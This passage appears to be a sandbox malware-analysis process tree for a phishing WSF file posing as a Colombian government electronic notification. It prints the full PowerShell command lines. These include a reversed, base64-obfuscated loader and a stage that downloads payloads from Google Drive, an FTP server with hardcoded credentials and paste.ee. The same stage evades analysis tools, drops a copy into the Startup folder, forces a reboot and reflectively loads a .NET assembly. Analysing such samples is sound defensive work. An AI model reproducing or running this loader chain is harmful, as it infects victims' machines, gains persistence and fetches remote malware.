[char]66 + 'hAGgAcw' + [char]66 + 'lAHIAaQ' + [char]66 + 'XACcAIA' + [char]66 + 'zAHMAZQ' + [char]66 + 'jAG8Acg' + [char]66 + 'wAC0AdA' + [char]66 + 'lAGcAKAAoAGYAaQA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwAgAH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAFoAdw' + [char]66 + 'mAHcAVQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgAD0AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAFoAdw' + [char]66 + 'mAHcAVQAkADsAKQAgACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgACwAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHEAdw' + [char]66 + 'qAHYAegAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7AH0AOwAgACkAJw' + [char]66 + '3ADUAMA' + [char]66 + 'aADEAOA' + [char]66 + '1AGMANw' + [char]66 + 'aAE0ASwA4ADgAZw' + [char]66 + 'lAHQAaA' + [char]66 + 'qAG4AQQ' + [char]66 + 'wAGoAMQ' + [char]66 + 'MAEIALQA0AHkASA' + [char]66 + 'hAGEAMQAnACAAKwAgAHYAZg' + [char]66 + 'xAG0AbgAkACgAIAA9ACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnAFYARQ' + [char]66 + 'TAGQAag' + [char]66 + '3AFUAOQA1AFIALQ' + [char]66 + 'XAHMAWQ' + [char]66 + '1AFoATA' + [char]66 + 'pAHcAcg' + [char]66 + 'iADUAWQ' + [char]66 + 'OAFEALQ' + [char]66 + 'IAGoAcg' + [char]66 + 'iADIAcAAxACcAIAArACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKAAgAD0AIA' + [char]66 + '2AGYAcQ' + [char]66 + 'tAG4AJA' + [char]66 + '7ACAAKQAgAGkAZg' + [char]66 + 'tAHUAWAAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAAaQ' + [char]66 + 'mAG0AdQ' + [char]66 + 'YACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHYAZg' + [char]66 + 'xAG0AbgAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJA' + [char]66 + '7ACAAKQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAOwA=';$nymcr = $nymcr.replace('уЦϚ' , 'B') ;;$cpdfb = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nymcr ) ); $cpdfb = $cpdfb[-1..-$cpdfb.Length] -join '';$cpdfb = $cpdfb.replace('%XRqhI%','C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF');powershell $cpdfb
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1788
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $cIOeC = $host.Version.Major.Equals(2) ;if ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$nmqfv = 'https://drive.google.com/uc?export=download&id=';$Xumfi = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $Xumfi ) {$nmqfv = ($nmqfv + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$nmqfv = ($nmqfv + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$zvjwq = (New-Object Net.WebClient);$zvjwq.Encoding = [System.Text.Encoding]::UTF8;$zvjwq.DownloadFile($nmqfv, ($HzOMj + '\Upwin.msu') );$UwfwZ = ('C:\Users\' + [Environment]::UserName );JCCGX = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF' -Destination ( $UwfwZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$nqcnz = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$LQQAB = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($LQQAB, $lllGq) ;$RVUXv = $webClient.DownloadString( $nqcnz ) ;$RVUXv | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$aeDwU = '$sNwoM = ''C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF'' ; $ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$aeDwU += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$aeDwU += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$aeDwU += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$aeDwU += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''0/zpfHt/d/ee.etsap//:sptth'' , $sNwoM , ''DDDMSBuild'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$aeDwU | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
        5⤵
        Drops startup file
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2596
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe JCCGX /quiet /norestart
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1860
        
        C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" JCCGX /quiet /norestart
        7⤵
        Drops file in Windows directory
        
        PID:1332
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1784
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF"
    3⤵
    PID:2864
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nymcr = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAHoAVw' + [char]66 + 'XAEIAVgAkADsAJwA7ACkAIAApACAAIAAnACcAZA' + [char]66 + 'sAGkAdQ' + [char]66 + 'CAFMATQ' + [char]66 + 'EAEQARAAnACcAIAAgACwAIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHAAYQ' + [char]66 + 'zAHQAZQAuAGUAZQAvAGQALw' + [char]66 + '0AEgAZg' + [char]66 + 'wAHoALwAwACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAJwA7ACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAJwAgACsAIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgACsAIAAnACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACgAIAA9ACAARw' + [char]66 + 'lAGEAeQ' + [char]66 + 'yACQAIAA7ACAAJwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAnACAAPQAgAE0Abw' + [char]66 + '3AE4AcwAkACcAIAAgAD0AIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAE4AbA' + [char]66 + 'yAGgAUAAkACAAPQAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAIAAoACAAPQAgACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAOwAgADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4ATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AIAA9ACAATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgACkAJw' + [char]66 + '0AHgAdAAuADIAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGwARw' + [char]66 + 'mAFQAUwAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACcAOA' + [char]66 + 'GAFQAVQAnACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIA' + [char]66 + 'WAHAAaw' + [char]66 + '1AEoAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHYAWA' + [char]66 + 'VAFYAUgAkADsAIAApACAAeg' + [char]66 + 'uAGMAcQ' + [char]66 + 'uACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + '3ACQAIAA9ACAAdg' + [char]66 + 'YAFUAVg' + [char]66 + 'SACQAOwAgACkAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAIAAsAEIAQQ' + [char]66 + 'RAFEATAAkACgAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQw' + [char]66 + 'rAHIAbw' + [char]66 + '3AHQAZQ' + [char]66 + 'OAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAC0Adw' + [char]66 + 'lAG4AIAA9ACAAcw' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAIAApACkAIAA0ADYAIAAsADQANgAgACwANAA2ACAALAA0ADYAIAAsADQANgAgACwANAA2ACAALAA2ADUAIAAsADUANQAgACwAMwA1ACAALAA5ADQAIAAsADkAOAAgACwAMAAwADEAIAAsADcAMQAxACAALAA5ADgAIAAsADIAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIAA9ACAAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAOwAgACkAKQA5ADQALAA2ADEAMQAsADcAOQAsADQAMQAxACwAOAA5ACwAOAAxADEALAA3ADAAMQAsADkAOQAsADUAMQAxACwAMQAwADEALAAwADAAMQAoAF0AXQ' + [char]66 + 'bAHIAYQ' + [char]66 + 'oAGMAWwAgAG4AaQ' + [char]66 + 'vAGoALQAoACAAPQAgAEIAQQ' + [char]66 + 'RAFEATAAkADsAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvACcAIAArACAAJw' + [char]66 + 'yAGUAdA' + [char]66 + 'wAHkAcg' + [char]66 + 'jAHAAVQAvAHIAYgAuAG0Abw' + [char]66 + 'jAC4AdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAuAHAAdA' + [char]66 + 'mAEAAMQ' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC8ALwA6AHAAdA' + [char]66 + 'mACcAKAAgAD0AIA' + [char]66 + '6AG4AYw' + [char]66 + 'xAG4AJAA7AH0AIAAKAA0AOw' + [char]66 + '0AGkAeA' + [char]66 + 'lACAAIAAgACAAIAAgAAoADQA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'yAGUAdA' + [char]66 + '1AHAAbQ' + [char]66 + 'vAEMALQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'SAAoADQAgAHsAZQ' + [char]66 + 'zAGwAZQAKAA0ACgANAH0ACgANACAAIAAgACAAIAAgACAACgANACAAewApAGwAbA' + [char]66 + '1AE4AJAAgAHEAZQAtACAAKQ' + [char]66 + 'lAHUAbg' + [char]66 + 'pAHQAbg' + [char]66 + 'vAEMAeQ' + [char]66 + 'sAHQAbg' + [char]66 + 'lAGwAaQ' + [char]66 + 'TACAAYQ' + [char]66 + 'lAC0AIAAnAGUAeg' + [char]66 + '5AGwAYQ' + [char]66 + 'uAGEAJwAsACcAUw' + [char]66 + 'OAEQAZQ' + [char]66 + '0AGEAcA' + [char]66 + 'hACcALAAnAGsAcg' + [char]66 + 'hAGgAcw' + [char]66 + 'lAHIAaQ' + [char]66 + 'XACcAIA' + [char]66 + 'zAHMAZQ' + [char]66 + 'jAG8Acg' + [char]66 + 'wAC0AdA' + [char]66 + 'lAGcAKAAoAGYAaQA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwAgAH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 